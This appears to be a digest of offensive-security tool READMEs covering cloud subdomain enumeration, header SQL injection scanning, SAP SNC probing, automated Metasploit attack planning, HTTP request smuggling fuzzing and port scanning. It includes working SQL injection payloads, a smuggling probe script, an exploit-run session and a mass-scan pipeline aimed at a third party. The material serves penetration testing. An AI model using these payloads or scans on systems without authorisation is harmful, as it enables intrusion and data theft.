Special thanks to @Liodeus for providing project inspiration through swaggerHole.
AzSubEnum is a specialized subdomain enumeration tool tailored for Azure services. This tool is designed to meticulously search and identify subdomains associated with various Azure services. Through a combination of techniques and queries, AzSubEnum delves into the Azure domain structure, systematically probing and collecting subdomains related to a diverse range of Azure services.
AzSubEnum operates by leveraging DNS resolution techniques and systematic permutation methods to unveil subdomains associated with Azure services such as Azure App Services, Storage Accounts, Azure Databases (including MSSQL, Cosmos DB, and Redis), Key Vaults, CDN, Email, SharePoint, Azure Container Registry, and more. Its functionality extends to comprehensively scanning different Azure service domains to identify associated subdomains.
With this tool, users can conduct thorough subdomain enumeration within Azure environments, aiding security professionals, researchers, and administrators in gaining insights into the expansive landscape of Azure services and their corresponding subdomains.
During my learning journey on Azure AD exploitation, I discovered that the Azure subdomain tool, Invoke-EnumerateAzureSubDomains from NetSPI, was unable to run on my Debian PowerShell. Consequently, I created a crude implementation of that tool in Python.
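The underlying idea is easy to sketch in Python: build candidate names and try to resolve them against known Azure service suffixes. The suffix list and permutations below are a small assumed sample, not the tool's full set:

import socket

# A few well-known Azure service domain suffixes (sample, not exhaustive).
AZURE_SUFFIXES = {
    "App Services": "azurewebsites.net",
    "Storage Accounts": "blob.core.windows.net",
    "Databases (MSSQL)": "database.windows.net",
    "Key Vaults": "vault.azure.net",
}

def enumerate_subdomains(base, permutations=("", "dev", "prod", "test")):
    """Resolve candidate <base><perm>.<suffix> names; a DNS answer means the
    subdomain exists."""
    for service, suffix in AZURE_SUFFIXES.items():
        for perm in permutations:
            host = f"{base}{perm}.{suffix}"
            try:
                socket.gethostbyname(host)
                yield service, host
            except socket.gaierror:
                pass  # name does not resolve: not registered

for service, host in enumerate_subdomains("retailcorp"):
    print(f"{service}: {host}")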
$ python3 azsubenum.py --help
usage: azsubenum.py [-h] -b BASE [-v] [-t THREADS] [-p PERMUTATIONS]
Azure Subdomain Enumeration
options:
-h, --help show this help message and exit
-b BASE, --base BASE Base name to use
-v, --verbose Show verbose output
-t THREADS, --threads THREADS
Number of threads for concurrent execution
-p PERMUTATIONS, --permutations PERMUTATIONS
File containing permutations
Basic enumeration:
python3 azsubenum.py -b retailcorp --threads 10
Using permutation wordlists:
python3 azsubenum.py -b retailcorp --threads 10 --permutations permutations.txt
With verbose output:
python3 azsubenum.py -b retailcorp --threads 10 --permutations permutations.txt --verbose
SqliSniper is a robust Python tool designed to detect time-based blind SQL injections in HTTP request headers. It enhances the security assessment process by rapidly scanning and identifying potential vulnerabilities using a multi-threaded approach, ensuring speed and efficiency. Unlike other scanners, SqliSniper is designed to eliminate false positives and can send alerts upon detection through its built-in Discord notification functionality.
git clone https://github.com/danialhalo/SqliSniper.git
cd SqliSniper
chmod +x sqlisniper.py
pip3 install -r requirements.txt
This will display help for the tool. Here are all the options it supports.
ubuntu:~/sqlisniper$ ./sqlisniper.py -h
[SqliSniper ASCII-art banner]
-: By Muhammad Danial :-
usage: sqlisniper.py [-h] [-u URL] [-r URLS_FILE] [-p] [--proxy PROXY] [--payload PAYLOAD] [--single-payload SINGLE_PAYLOAD] [--discord DISCORD] [--headers HEADERS]
[--threads THREADS]
Detect SQL injection by sending malicious queries
options:
-h, --help show this help message and exit
-u URL, --url URL Single URL for the target
-r URLS_FILE, --urls_file URLS_FILE
File containing a list of URLs
-p, --pipeline Read from pipeline
--proxy PROXY Proxy for intercepting requests (e.g., http://127.0.0.1:8080)
--payload PAYLOAD File containing malicious payloads (default is payloads.txt)
--single-payload SINGLE_PAYLOAD
Single payload for testing
--discord DISCORD Discord Webhook URL
--headers HEADERS File containing headers (default is headers.txt)
--threads THREADS Number of threads
The URL can be provided with the -u flag for a single-site scan:
./sqlisniper.py -u http://example.com
The -r flag allows SqliSniper to read a file containing multiple URLs for simultaneous scanning:
./sqlisniper.py -r url.txt
SqliSniper can also work with pipeline input using the -p flag:
cat url.txt | ./sqlisniper.py -p
The pipeline feature facilitates seamless integration with other tools. For instance, you can utilize tools like subfinder and httpx, and then pipe their output to SqliSniper for mass scanning.
subfinder -silent -d google.com | sort -u | httpx -silent | ./sqlisniper.py -p
By default, SqliSniper uses the payloads.txt file. A custom payloads file can be supplied with the --payload flag:
./sqlisniper.py -u http://example.com --payload mssql_payloads.txt
When using a custom payloads file, make sure to substitute the sleep time with %__TIME_OUT__%. SqliSniper dynamically adjusts the sleep time iteratively to mitigate potential false positives. The payloads file should look like this:
ubuntu:~/sqlisniper$ cat payloads.txt
0\"XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR\"Z
"0"XOR(if(now()=sysdate()%2Csleep(%__TIME_OUT__%)%2C0))XOR"Z"
0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z
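Conceptually, the iterative sleep-time check works along these lines (a hedged sketch, not SqliSniper's actual implementation; the function names are illustrative):

# Sketch of time-based blind SQLi detection with an escalating timeout.
# Illustrative only; mirrors the %__TIME_OUT__% substitution described above.
import time
import requests

def is_delayed(url, header_name, payload_template, sleep_time):
    payload = payload_template.replace("%__TIME_OUT__%", str(sleep_time))
    start = time.monotonic()
    try:
        requests.get(url, headers={header_name: payload}, timeout=sleep_time + 10)
    except requests.exceptions.Timeout:
        return True
    return time.monotonic() - start >= sleep_time

def confirm_injection(url, header_name, payload_template):
    # Re-test with increasing delays: a real injection delays proportionally,
    # which filters out servers that are merely slow (false positives).
    return all(is_delayed(url, header_name, payload_template, t) for t in (5, 10))

tpl = "0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z"
if confirm_injection("http://example.com", "User-Agent", tpl):
    print("[+] Possible time-based SQLi via User-Agent header")

Requiring the delay to scale with the requested sleep time is what separates a genuine injection from a merely slow server.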
If you want to test with only a single payload, the --single-payload flag can be used. Make sure to replace the sleep time with %__TIME_OUT__%:
./sqlisniper.py -r url.txt --single-payload "0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z"
Headers are read from the headers.txt file. To scan a custom header, add the HTTP request header to headers.txt:
ubuntu:~/sqlisniper$ cat headers.txt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
X-Forwarded-For: 127.0.0.1
SqliSniper also offers Discord alert notifications, enhancing its functionality by providing real-time alerts through Discord webhooks. This feature proves invaluable during large-scale scans, allowing prompt notifications upon detection.
./sqlisniper.py -r url.txt --discord <web_hookurl>
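For reference, a Discord webhook alert boils down to a single JSON POST; a minimal sketch (the message format is an assumption, not SqliSniper's exact output):

# Sketch of a Discord webhook notification (illustrative payload format).
import requests

def notify_discord(webhook_url, target, header, payload):
    message = (f"Time-based SQLi detected\n"
               f"Target: {target}\nHeader: {header}\nPayload: {payload}")
    # Discord webhooks accept a JSON body with a "content" field.
    requests.post(webhook_url, json={"content": message}, timeout=10)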
The number of threads can be set with the --threads flag:
./sqlisniper.py -r url.txt --threads 10
Note: Keep in mind that a higher number of threads may lead to false positives or missed findings. Given the nature of time-based SQL injection, a lower thread count is recommended for more accurate detection.
SqliSniper is made in Python with lots of <3 by @Muhammad Danial.
Tool for analyzing SAP Secure Network Communications (SNC).
In its current state, sncscan can be used to read the SNC configurations for SAP Router and DIAG (SAP GUI) connections. Support for the SAP RFC protocol is currently in development.
SAP Routers either support SNC or they do not; a more granular configuration of the SNC parameters is not possible. Nevertheless, sncscan can find out whether it is activated:
sncscan -H 10.3.161.4 -S 3299 -p router
The SNC configuration of a DIAG connection used by a SAP GUI can have more versatile settings than the router configuration. A detailed overview of the system parameters that can be read with sncscan, and how they impact the connection's security, is given in the Background section.
sncscan -H 10.3.161.3 -S 3200 -p diag
Multiple targets can be scanned with one command:
sncscan -L /H/192.168.56.101/S/3200,/H/192.168.56.102/S/3206
sncscan --route-string /H/10.3.161.5/S/3299/H/10.3.161.3/S/3200 -p diag
Requirements: Currently, sncscan only works with the pysap library from our fork.
python3 -m pip install -r requirements.txt
or
python3 setup.py test
python3 setup.py install
SAP protocols, such as DIAG or RFC, do not provide high security themselves. To increase security and ensure authentication, integrity and encryption, the use of SNC (Secure Network Communications) is required. SNC protects the data communication paths between various client and server components of the SAP system that use the RFC, DIAG or router protocol by applying known cryptographic algorithms to the data in order to increase its security. There are three different levels of data protection that can be applied to an SNC-secured connection:
Each SAP system can be configured with SNC parameters for the communication security. The level of the SNC connection is determined by the Quality of Protection parameters:
Additional SNC parameters can be used for further system-specific configuration options, including the snc/only_encrypted_gui parameter, which ensures that encrypted SAPGUI connections are enforced.
As long as a SAP System is addressed that is capable of sending SNC messages, it also responds to valid SNC requests, regardless of which IP, port, and CN were specified for SNC. This response contains the requirements that the SAP system has for the SNC connection, which can then be used to obtain the SNC parameters. This can be used to find out whether an SAP system has SNC enabled and, if so, which SNC parameters have been set.
To know more about our Attack Surface
Management platform, check out NVADR.
Bugsy is a command-line interface (CLI) tool that provides automatic security vulnerability remediation for your code. It is the community edition version of Mobb, the first vendor-agnostic automated security vulnerability remediation tool. Bugsy is designed to help developers quickly identify and fix security vulnerabilities in their code.
Mobb is the first vendor-agnostic automatic security vulnerability remediation tool. It ingests SAST results from Checkmarx, CodeQL (GitHub Advanced Security), OpenText Fortify, and Snyk and produces code fixes for developers to review and commit to their code.
Bugsy has two modes - Scan (no SAST report needed) & Analyze (the user needs to provide a pre-generated SAST report from one of the supported SAST tools).
Scan
Analyze
This is a community edition version that only analyzes public GitHub repositories. Analyzing private repositories is allowed for a limited amount of time. Bugsy does not detect any vulnerabilities in your code, it uses findings detected by the SAST tools mentioned above.
You can simply run Bugsy from the command line, using npx:
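(The project README supplies the exact command; assuming the npm package name mobbdev, which is an assumption to be checked against the README, an invocation would look something like the following.)
npx mobbdev@latest scan -r https://github.com/WebGoat/WebGoat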
CATSploit is an automated penetration testing tool using the Cyber Attack Techniques Scoring (CATS) method that can be used without a pentester. Ordinarily, pentesters implicitly select suitable attack techniques for the target systems. CATSploit uses system configuration information such as OS, open ports, and software versions collected by a scanner, and calculates score values for capture (eVc) and detectability (eVd) of each attack technique for the target system. By selecting the highest score values, it is possible to select the most appropriate attack technique for the target system without the hack knack (professional pentester's skill).
CATSploit automatically performs penetration tests in the following sequence:
Information gathering and prior information input: First, CATSploit gathers information about the target systems. It supports nmap and OpenVAS for information gathering, and also accepts prior information about the target systems if you have it.
Calculating score values of attack techniques: Using the information obtained in the previous phase and the attack techniques database, evaluation values for capture (eVc) and detectability (eVd) of each attack technique are calculated for each target computer.
Selection of attack techniques by score and attack scenario creation: Attack techniques are selected and attack scenarios are created according to pre-defined policies. For example, under a policy that prioritizes being hard to detect, the attack techniques with the lowest eVd (detectability score) are selected.
Execution of the attack scenario: CATSploit executes the attack techniques according to the attack scenario constructed in the previous phase, using Metasploit as a framework and the Metasploit API to execute actual attacks.
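To make the scoring and selection steps concrete, here is a hedged sketch of policy-based technique selection (the data structures and scoring rule are illustrative, not CATSploit's actual formulas):

# Sketch of score-based attack-technique selection (illustrative only).
# Each technique gets a capture score (eVc) and a detectability score (eVd).
def score_techniques(target, techniques):
    scored = []
    for tech in techniques:
        # eVc: can this technique capture the target? Here: all required
        # services must be present (real scoring is far more granular).
        evc = 100.0 if tech["requires"] <= target["services"] else 0.0
        # eVd: how detectable the attack is (lower is stealthier).
        evd = tech["noise"]
        scored.append({"name": tech["name"], "eVc": evc, "eVd": evd})
    return scored

def select_stealthiest(scored):
    # Policy "hard-to-detect": among viable techniques, pick the lowest eVd.
    viable = [t for t in scored if t["eVc"] > 0]
    return min(viable, key=lambda t: t["eVd"], default=None)

target = {"services": {"http:apache:2.4.7", "ftp:proftpd:1.3.5"}}
techniques = [
    {"name": "exploit/multi/http/drupal_drupageddon",
     "requires": {"http:apache:2.4.7"}, "noise": 32.0},
    {"name": "auxiliary/scanner/ssh/ssh_login",
     "requires": {"ssh:openssh:6.6.1"}, "noise": 60.0},
]
print(select_stealthiest(score_techniques(target, techniques)))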
CATSploit has the following prerequisites:
For Metasploit, Nmap and OpenVAS, it is assumed to be installed with the Kali Distribution.
To install the latest version of CATSploit, please use the following commands:
$ git clone https://github.com/catsploit/catsploit.git
$ cd catsploit
$ git clone https://github.com/catsploit/cats-helper.git
$ sudo ./setup.sh
CATSploit uses a server-client configuration, and the server reads a JSON configuration file at startup. In config.json, the following fields should be modified for your environment.
(*) Adjust the number according to the specs of your machine.
To start the server, execute the following command:
$ python cats_server.py -c [CONFIG_FILE]
Next, prepare another console, start the client program, and initiate a connection to the server.
$ python catsploit.py -s [SOCKET_PATH]
After successfully connecting to the server and initializing it, the session will start.
_________ ___________ __ _ __
/ ____/ |/_ __/ ___/____ / /___ (_) /_
/ / / /| | / / \__ \/ __ \/ / __ \/ / __/
/ /___/ ___ |/ / ___/ / /_/ / / /_/ / / /_
\____/_/ |_/_/ /____/ .___/_/\____/_/\__/
/_/
[*] Connecting to cats-server
[*] Done.
[*] Initializing server
[*] Done.
catsploit>
The client can execute a variety of commands. Each command can be executed with the -h option to display the format of its arguments.
usage: [-h] {host,scenario,scan,plan,attack,post,reset,help,exit} ...
positional arguments:
{host,scenario,scan,plan,attack,post,reset,help,exit}
options:
-h, --help show this help message and exit
I've posted the commands and options below as well for reference.
host list:
show information about the hosts
usage: host list [-h]
options:
-h, --help show this help message and exit
host detail:
show more information about one host
usage: host detail [-h] host_id
positional arguments:
host_id ID of the host for which you want to show information
options:
-h, --help show this help message and exit
scenario list:
show information about the scenarios
usage: scenario list [-h]
options:
-h, --help show this help message and exit
scenario detail:
show more information about one scenario
usage: scenario detail [-h] scenario_id
positional arguments:
scenario_id ID of the scenario for which you want to show information
options:
-h, --help show this help message and exit
scan:
run network-scan and security-scan
usage: scan [-h] [--port PORT] target_host [target_host ...]
positional arguments:
target_host IP address to be scanned
options:
-h, --help show this help message and exit
--port PORT ports to be scanned
plan:
planning attack scenarios
usage: plan [-h] src_host_id dst_host_id
positional arguments:
src_host_id originating host
dst_host_id target host
options:
-h, --help show this help message and exit
attack:
execute attack scenario
usage: attack [-h] scenario_id
positional arguments:
scenario_id ID of the scenario you want to execute
options:
-h, --help show this help message and exit
post find-secret:
find files containing confidential information on the pwned host
usage: post find-secret [-h] host_id
positional arguments:
host_id ID of the host for which you want to find confidential information
options:
-h, --help show this help message and exit
reset:
reset data on the server
usage: reset [-h] {system} ...
positional arguments:
{system} reset system
options:
-h, --help show this help message and exit
exit:
exit CATSploit
usage: exit [-h]
options:
-h, --help show this help message and exit
In this example, we use CATSploit to scan network, plan the attack scenario, and execute the attack.
catsploit> scan 192.168.0.0/24
Network Scanning ... 100%
[*] Total 2 hosts were discovered.
Vulnerability Scanning ... 100%
[*] Total 14 vulnerabilities were discovered.
catsploit> host list
hostID   | IP           | Hostname | Platform                | Pwned
---------|--------------|----------|-------------------------|------
attacker | 0.0.0.0      | kali     | kali 2022.4             | True
h_exbiy6 | 192.168.0.10 |          | Linux 3.10 - 4.11       | False
h_nhqyfq | 192.168.0.20 |          | Microsoft Windows 7 SP1 | False
catsploit> host detail h_exbiy6
hostID   | IP           | Hostname | Platform     | Pwned
---------|--------------|----------|--------------|------
h_exbiy6 | 192.168.0.10 | ubuntu   | ubuntu 14.04 | False
[IP address]
ipv4         | ipv4mask | ipv6 | ipv6prefix
-------------|----------|------|-----------
192.168.0.10 |          |      |
[Open ports]
ip           | proto | port | service     | product      | version
-------------|-------|------|-------------|--------------|---------------------------
192.168.0.10 | tcp   | 21   | ftp         | ProFTPD      | 1.3.5
192.168.0.10 | tcp   | 22   | ssh         | OpenSSH      | 6.6.1p1 Ubuntu 2ubuntu2.10
192.168.0.10 | tcp   | 80   | http        | Apache httpd | 2.4.7
192.168.0.10 | tcp   | 445  | netbios-ssn | Samba smbd   | 3.X - 4.X
192.168.0.10 | tcp   | 631  | ipp         | CUPS         | 1.7
[Vulnerabilities]
ip           | proto | port | vuln_name                                                            | cve
-------------|-------|------|----------------------------------------------------------------------|---------------
192.168.0.10 | tcp   | 0    | TCP Timestamps Information Disclosure                                | N/A
192.168.0.10 | tcp   | 21   | FTP Unencrypted Cleartext Login                                      | N/A
192.168.0.10 | tcp   | 22   | Weak MAC Algorithm(s) Supported (SSH)                                | N/A
192.168.0.10 | tcp   | 22   | Weak Encryption Algorithm(s) Supported (SSH)                         | N/A
192.168.0.10 | tcp   | 22   | Weak Host Key Algorithm(s) (SSH)                                     | N/A
192.168.0.10 | tcp   | 22   | Weak Key Exchange (KEX) Algorithm(s) Supported (SSH)                 | N/A
192.168.0.10 | tcp   | 80   | Test HTTP dangerous methods                                          | N/A
192.168.0.10 | tcp   | 80   | Drupal Core SQLi Vulnerability (SA-CORE-2014-005) - Active Check     | CVE-2014-3704
192.168.0.10 | tcp   | 80   | Drupal Coder RCE Vulnerability (SA-CONTRIB-2016-039) - Active Check  | N/A
192.168.0.10 | tcp   | 80   | Sensitive File Disclosure (HTTP)                                     | N/A
192.168.0.10 | tcp   | 80   | Unprotected Web App / Device Installers (HTTP)                       | N/A
192.168.0.10 | tcp   | 80   | Cleartext Transmission of Sensitive Information via HTTP             | N/A
192.168.0.10 | tcp   | 80   | jQuery < 1.9.0 XSS Vulnerability                                     | CVE-2012-6708
192.168.0.10 | tcp   | 80   | jQuery < 1.6.3 XSS Vulnerability                                     | CVE-2011-4969
192.168.0.10 | tcp   | 80   | Drupal 7.0 Information Disclosure Vulnerability - Active Check       | CVE-2011-3730
192.168.0.10 | tcp   | 631  | SSL/TLS: Report Vulnerable Cipher Suites for HTTPS                   | CVE-2016-2183
192.168.0.10 | tcp   | 631  | SSL/TLS: Report Vulnerable Cipher Suites for HTTPS                   | CVE-2016-6329
192.168.0.10 | tcp   | 631  | SSL/TLS: Report Vulnerable Cipher Suites for HTTPS                   | CVE-2020-12872
192.168.0.10 | tcp   | 631  | SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection           | CVE-2011-3389
192.168.0.10 | tcp   | 631  | SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection           | CVE-2015-0204
[Users]
user name | group
----------|------
catsploit> plan attacker h_exbiy6
Planning attack scenario...100%
[*] Done. 15 scenarios were planned.
[*] To check each scenario, try 'scenario list' and/or 'scenario detail'.
catsploit> scenario list
scenario id | src host ip | target host ip | eVc   | eVd   | steps | first attack step
------------|-------------|----------------|-------|-------|-------|------------------------------
3d3ivc      | 0.0.0.0     | 192.168.0.10   | 1.0   | 32.0  | 1     | exploit/multi/http/jenkins_s…
5gnsvh      | 0.0.0.0     | 192.168.0.10   | 1.0   | 53.76 | 2     | exploit/multi/http/jenkins_s…
6nlxyc      | 0.0.0.0     | 192.168.0.10   | 0.0   | 48.32 | 2     | exploit/multi/http/jenkins_s…
8jos4z      | 0.0.0.0     | 192.168.0.10   | 0.7   | 72.8  | 2     | exploit/multi/http/jenkins_s…
8kmmts      | 0.0.0.0     | 192.168.0.10   | 0.0   | 32.0  | 1     | exploit/multi/elasticsearch/…
agjmma      | 0.0.0.0     | 192.168.0.10   | 0.0   | 24.0  | 1     | exploit/windows/http/managee…
joglhf      | 0.0.0.0     | 192.168.0.10   | 70.0  | 60.0  | 1     | auxiliary/scanner/ssh/ssh_lo…
rmgrof      | 0.0.0.0     | 192.168.0.10   | 100.0 | 32.0  | 1     | exploit/multi/http/drupal_dr…
xuowzk      | 0.0.0.0     | 192.168.0.10   | 0.0   | 24.0  | 1     | exploit/multi/http/struts_dm…
yttv51      | 0.0.0.0     | 192.168.0.10   | 0.01  | 53.76 | 2     | exploit/multi/http/jenkins_s…
znv76x      | 0.0.0.0     | 192.168.0.10   | 0.01  | 53.76 | 2     | exploit/multi/http/jenkins_s…
catsploit> scenario detail rmgrof
src host ip | target host ip | eVc   | eVd
------------|----------------|-------|-----
0.0.0.0     | 192.168.0.10   | 100.0 | 32.0
[Steps]
# | step                                  | params
--|---------------------------------------|----------------------
1 | exploit/multi/http/drupal_drupageddon | RHOSTS: 192.168.0.10
  |                                       | LHOST: 192.168.10.100
catsploit> attack rmgrof
> ~
> Metasploit Console Log
> ~
[+] Attack scenario succeeded!
catsploit> exit
Bye.
All information and code is provided solely for educational purposes and/or for testing your own systems.
For any inquiry, please contact the email address as follows:
catsploit@nk.MitsubishiElectric.co.jp
A project for fuzzing HTTP/1.1 CL.0 Request Smuggling Attack Vectors.
Thank you to @albinowax, @defparam and @d3d, without whom this tool would not exist. Inspired by the tool Smuggler; all attack gadgets are adapted from Smuggler and https://portswigger.net/research/how-to-turn-security-research-into-profit
For more info see: https://moopinger.github.io/blog/fuzzing/clzero/tools/request/smuggling/2023/11/15/Fuzzing-With-CLZero.html
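In a CL.0 desync the front-end honors the request's Content-Length while the back-end ignores it, so the body becomes the prefix of the next request on the reused connection. A rough probe sketch (illustrative; this is not CLZero's implementation):

# Illustrative CL.0 probe: if the back-end ignores Content-Length, the body
# below is parsed as the start of the NEXT request on the connection.
import socket, ssl

probe = (
    b"POST / HTTP/1.1\r\n"
    b"Host: www.target.com\r\n"
    b"Content-Length: 32\r\n"
    b"Connection: keep-alive\r\n"
    b"\r\n"
    b"GET /hopefully404 HTTP/1.1\r\n"
    b"X: Y"  # smuggled prefix that will swallow the follow-up request line
)
follow_up = b"GET / HTTP/1.1\r\nHost: www.target.com\r\n\r\n"

ctx = ssl.create_default_context()
with ctx.wrap_socket(socket.create_connection(("www.target.com", 443)),
                     server_hostname="www.target.com") as s:
    s.sendall(probe + follow_up)
    # If the response to the follow-up GET / is a 404, the back-end likely
    # executed the smuggled prefix: a CL.0 desync indicator.
    print(s.recv(65535).decode(errors="replace"))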
usage: clzero.py [-h] [-url URL] [-file FILE] [-index INDEX] [-verbose] [-no-color] [-resume] [-skipread] [-quiet] [-lb] [-config CONFIG] [-method METHOD]
CLZero by Moopinger
optional arguments:
-h, --help show this help message and exit
-url URL (-u), Single target URL.
-file FILE (-f), Files containing multiple targets.
-index INDEX (-i), Index start point when using a file list. Default is first line.
-verbose (-v), Enable verbose output.
-no-color Disable colors in HTTP Status
-resume Resume scan from last index place.
-skipread Skip the read response on smuggle requests, recommended. This will save a lot of time between requests. Ideal for targets with standard HTTP traffic.
-quiet (-q), Disable output. Only successful payloads will be written to ./payloads/
-lb Last byte sync method for least request latency. Due to the nature of the request, it cannot guarantee that the smuggle request will be processed first. Ideal for targets with a high amount of traffic, and you do not mind sending multiple requests.
-config CONFIG (-c) Config file to load, see ./configs/ to create custom payloads
-method METHOD (-m) Method to use when sending the smuggle request. Default: POST
Single target attack:
python3 clzero.py -u https://www.target.com/ -c configs/default.py -skipread
python3 clzero.py -u https://www.target.com/ -c configs/default.py -lb
Multi target attack:
python3 clzero.py -f urls.txt -c configs/default.py -skipread
python3 clzero.py -f urls.txt -c configs/default.py -lb
git clone https://github.com/Moopinger/CLZero.git
cd CLZero
pip3 install -r requirements.txt
NetworkSherlock is a powerful and flexible port scanning tool designed for network security professionals and penetration testers. With its advanced capabilities, NetworkSherlock can efficiently scan IP ranges, CIDR blocks, and multiple targets. It stands out with its detailed banner grabbing capabilities across various protocols and integration with Shodan, the world's premier service for scanning and analyzing internet-connected devices. This Shodan integration enables NetworkSherlock to provide enhanced scanning capabilities, giving users deeper insights into network vulnerabilities and potential threats. By combining local port scanning with Shodan's extensive database, NetworkSherlock offers a comprehensive tool for identifying and analyzing network security issues.
NetworkSherlock requires Python 3.6 or later.
git clone https://github.com/HalilDeniz/NetworkSherlock.git
pip install -r requirements.txt
Update the networksherlock.cfg
file with your Shodan API key:
[SHODAN]
api_key = YOUR_SHODAN_API_KEY
python3 networksherlock.py --help
usage: networksherlock.py [-h] [-p PORTS] [-t THREADS] [-P {tcp,udp}] [-V] [-s SAVE_RESULTS] [-c] target
NetworkSherlock: Port Scan Tool
positional arguments:
target Target IP address(es), range, or CIDR (e.g., 192.168.1.1, 192.168.1.1-192.168.1.5,
192.168.1.0/24)
options:
-h, --help show this help message and exit
-p PORTS, --ports PORTS
Ports to scan (e.g. 1-1024, 21,22,80, or 80)
-t THREADS, --threads THREADS
Number of threads to use
-P {tcp,udp}, --protocol {tcp,udp}
Protocol to use for scanning
-V, --version-info Used to get version information
-s SAVE_RESULTS, --save-results SAVE_RESULTS
File to save scan results
-c, --ping-check Perform ping check before scanning
--use-shodan Enable Shodan integration for additional information
target: The target IP address(es), IP range, or CIDR block to scan.
-p, --ports: Ports to scan (e.g., 1-1000, 22,80,443).
-t, --threads: Number of threads to use.
-P, --protocol: Protocol to use for scanning (tcp or udp).
-V, --version-info: Obtain version information during banner grabbing.
-s, --save-results: Save results to the specified file.
-c, --ping-check: Perform a ping check before scanning.
--use-shodan: Enable Shodan integration.
Scan a single IP address on default ports:
python networksherlock.py 192.168.1.1
Scan an IP address with a custom range of ports:
python networksherlock.py 192.168.1.1 -p 1-1024
Scan multiple IP addresses on specific ports:
python networksherlock.py 192.168.1.1,192.168.1.2 -p 22,80,443
Scan an entire subnet using CIDR notation:
python networksherlock.py 192.168.1.0/24 -p 80
Perform a scan using multiple threads for faster execution:
python networksherlock.py 192.168.1.1-192.168.1.5 -p 1-1024 -t 20
Scan using a specific protocol (TCP or UDP):
python networksherlock.py 192.168.1.1 -p 53 -P udp
Enable Shodan integration for additional information:
python networksherlock.py 192.168.1.1 --use-shodan
python networksherlock.py 192.168.1.1,192.168.1.2 -p 22,80,443 -V --use-shodan
Perform a detailed scan with banner grabbing and save results to a file:
python networksherlock.py 192.168.1.1 -p 1-1000 -V -s results.txt
Scan an IP range after performing a ping check:
python networksherlock.py 10.0.0.1-10.0.0.255 -c
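Under the hood, the banner grabbing visible in the sample output below amounts to connecting and reading the service greeting; a minimal single-threaded sketch (illustrative, not NetworkSherlock's implementation):

# Sketch of TCP banner grabbing (illustrative only).
import socket

def grab_banner(ip, port, timeout=2):
    try:
        with socket.create_connection((ip, port), timeout=timeout) as s:
            s.settimeout(timeout)
            # FTP/SSH/SMTP greet first; nudge HTTP-like ports with a request.
            if port in (80, 8000, 8080):
                s.sendall(b"HEAD / HTTP/1.0\r\n\r\n")
            return s.recv(1024).decode(errors="replace").strip()
    except OSError:
        return ""

print(grab_banner("10.0.2.12", 22))  # e.g. SSH-2.0-OpenSSH_4.7p1 ...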
$ python3 networksherlock.py 10.0.2.12 -t 25 -V -p 21-6000
********************************************
Scanning target: 10.0.2.12
Scanning IP : 10.0.2.12
Ports : 21-6000
Threads : 25
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
22 /tcp open ssh SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
21 /tcp open telnet 220 (vsFTPd 2.3.4)
80 /tcp open http HTTP/1.1 200 OK
139 /tcp open netbios-ssn %SMBr
25 /tcp open smtp 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
23 /tcp open smtp #' #'
445 /tcp open microsoft-ds %SMBr
514 /tcp open shell
512 /tcp open exec Where are you?
1524/tcp open ingreslock root@metasploitable:/#
2121/tcp open iprop 220 ProFTPD 1.3.1 Server (Debian) [::ffff:10.0.2.12]
3306/tcp open mysql >
5900/tcp open unknown RFB 003.003
53 /tcp open domain
---------------------------------------------
$ python3 networksherlock.py 10.0.2.0/24 -t 10 -V -p 21-1000
********************************************
Scanning target: 10.0.2.1
Scanning IP : 10.0.2.1
Ports : 21-1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
53 /tcp open domain
********************************************
Scanning target: 10.0.2.2
Scanning IP : 10.0.2.2
Ports : 21-1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
445 /tcp open microsoft-ds
135 /tcp open epmap
********************************************
Scanning target: 10.0.2.12
Scanning IP : 10.0.2.12
Ports : 21-1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
21 /tcp open ftp 220 (vsFTPd 2.3.4)
22 /tcp open ssh SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
23 /tcp open telnet #'
80 /tcp open http HTTP/1.1 200 OK
53 /tcp open kpasswd 464/udpcp
445 /tcp open domain %SMBr
3306/tcp open mysql >
********************************************
Scanning target: 10.0.2.20
Scanning IP : 10.0.2.20
Ports : 21-1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
22 /tcp open ssh SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9
Contributions are welcome! To contribute to NetworkSherlock, follow these steps:
NetProbe is a tool you can use to scan for devices on your network. The program sends ARP requests to any IP address on your network and lists the IP addresses, MAC addresses, manufacturers, and device models of the responding devices.
You can download the program from the GitHub page.
$ git clone https://github.com/HalilDeniz/NetProbe.git
To install the required libraries, run the following command:
$ pip install -r requirements.txt
To run the program, use the following command:
$ python3 netprobe.py [-h] -t [...] -i [...] [-l] [-o] [-m] [-r] [-s]
-h, --help: show this help message and exit
-t, --target: Target IP address or subnet (default: 192.168.1.0/24)
-i, --interface: Interface to use (default: None)
-l, --live: Enable live tracking of devices
-o, --output: Output file to save the results
-m, --manufacturer: Filter by manufacturer (e.g., 'Apple')
-r, --ip-range: Filter by IP range (e.g., '192.168.1.0/24')
-s, --scan-rate: Scan rate in seconds (default: 5)
$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -o results.txt -l
$ python3 netprobe.py --help
usage: netprobe.py [-h] -t [...] -i [...] [-l] [-o] [-m] [-r] [-s]
NetProbe: Network Scanner Tool
options:
-h, --help show this help message and exit
-t [ ...], --target [ ...]
Target IP address or subnet (default: 192.168.1.0/24)
-i [ ...], --interface [ ...]
Interface to use (default: None)
-l, --live Enable live tracking of devices
-o , --output Output file to save the results
-m , --manufacturer Filter by manufacturer (e.g., 'Apple')
-r , --ip-range Filter by IP range (e.g., '192.168.1.0/24')
-s , --scan-rate Scan rate in seconds (default: 5)
$ python3 netprobe.py
You can enable live tracking of devices on your network by using the -l
or --live
flag. This will continuously update the device list every 5 seconds.
